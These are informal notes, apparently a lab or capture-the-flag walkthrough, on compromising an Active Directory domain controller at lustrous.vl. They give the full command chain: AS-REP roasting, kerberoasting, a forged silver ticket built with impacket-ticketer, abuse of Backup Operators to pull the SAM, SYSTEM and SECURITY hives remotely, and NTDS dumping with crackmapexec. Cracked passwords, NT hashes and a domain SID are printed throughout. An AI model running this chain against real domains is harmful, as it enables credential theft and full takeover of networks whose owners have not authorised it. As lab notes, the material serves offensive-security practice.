Anonymous ftp on the DC to get usernames, then we asreproast

cme ldap 10.10.211.85 -u loot/users.txt -p '' --asreproast loot/users.txt

ben.cox:Trinity1

Apparently he has remote access and can reverse a dpapi encrypted cred. but my winrm didn’t work at all LMFAO

LUSMS\\Administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF

we can also kerberoast

svc_web:iydgTvmujl6f

Website uses kerberos uath

USE FQDNS AND NTHASH FOR THE SERVICE ACOCUNT LMFAO

name doesn’t mater, only the id

impacket-ticketer -nthash E67AF8B3D78DF5A02EB0D57B6CB60717 -domain-sid S-1-5-21-2355092754-1584501958-1513963426 -domain lustrous.vl -spn HTTP/lusdc.lustrous.vl  -user-id 1114 svc_web
export KRB5CCNAME=svc_web.ccache
curl --negotiate -u : <http://lusdc.lustrous.vl/Internal/>

tony.ward:U_cPVQqEI50i1X

backup oeprator, no shell. we must dump remotely

git clone <https://github.com/horizon3ai/backup_dc_registry>
python3 reg.py lustrous.vl/tony.ward:[email protected] backup -p '\\\\lusdc.lustrous.vl\\c$'
impacket-smbclient lustrous.vl/tony.ward:[email protected]
use c$
get SAM
get SYSTEM
get SECURITY
impacket-secretsdump -sam sam -system system -security security local
cme smb 10.10.220.245 -u 'LUSDC$' -H '002e2962bdcf6bdb49f4552b27c52116' --ntds